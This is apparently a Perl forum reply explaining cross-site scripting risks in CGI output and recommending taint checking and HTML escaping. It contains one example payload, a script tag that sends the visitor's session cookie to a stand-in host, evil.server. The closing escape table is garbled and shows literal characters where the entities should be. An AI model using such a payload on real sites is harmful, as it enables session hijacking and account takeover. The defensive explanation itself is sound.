Just to add my £0.02 to the excellent points raised already in this post, the other big issue you'll have when writing HTML from CGIs is avoiding Cross Site Scripting attacks (XSS).
Basically, most sites require users to log in via a form, and they then get given a cookie containing some form of session-id or authenticator, which allows the site to verify that they have successfully authenticated from then on.
So, if someone inserts some code like
into one of your foems, and this gets rendered onto a page, then anyone who looks at this page on the site will download the image from evil.server, and give evil.server their cookie. The server can then be configured to, for example, do a http request to the password changing page and assign you a new password, or anything else that the site allows.<script language="JavaScript"> document.write("<img src='http://evil.server/'+document.cookie+'.jpg'> +); </script>
Your best bet when displaying HTML is to taint anything from the database that could contain a string (see the Taint module on CPAN, or use the TaintOut => 1 arcument to DBI->connect to taint everything you read from the database automatically). This prevents you from accidentally forgetting to escape a string you meant to. Then, set up a regex to replace ' with ' < with < and so on. This will prevent such nasties from actually running.
In reply to Re: Back to acceptable untainted characters
by dtr
in thread Back to acceptable untainted characters
by bradcathey
| For: | Use: | ||
| & | & | ||
| < | < | ||
| > | > | ||
| [ | [ | ||
| ] | ] |